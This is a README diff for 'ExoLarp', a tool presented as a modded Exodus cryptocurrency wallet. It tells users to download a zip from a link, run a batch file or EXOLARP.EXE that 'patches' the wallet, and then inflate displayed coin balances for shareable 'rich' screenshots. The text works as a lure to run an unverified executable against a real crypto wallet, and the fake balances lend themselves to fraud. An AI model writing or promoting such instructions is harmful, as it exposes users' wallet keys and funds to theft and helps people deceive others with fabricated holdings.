ExodusLarpX/ExoLarp-v2.0/README.md

 1. EXTRACT THE FILE.
 2. Download the Zip: Grab the secure archive from the link below
-3. Run the Bat: Double-click RUN THIS FIRST.bat.
-It'll patch and launch the modded Exodus in seconds.
+3. Run EXOLARP.EXE : Double-click  It'll patch and launch the modded Exodus in seconds.
 (Pro tip: Close any real Exodus instances so it doesn't bug out

 Flex Mode Activated: Boom!
 Your custom Exodus opens.
 Spot the Top 3 Drops button on the right sidebar?
 Click it to crank up the fake values – slide to 10x, 100x, or "Moonshot" mode.
 Watch your "BTC" hit 69,420 or your "DOGE" stack to the stars.
 Shareable previews included for that instant rich vibe.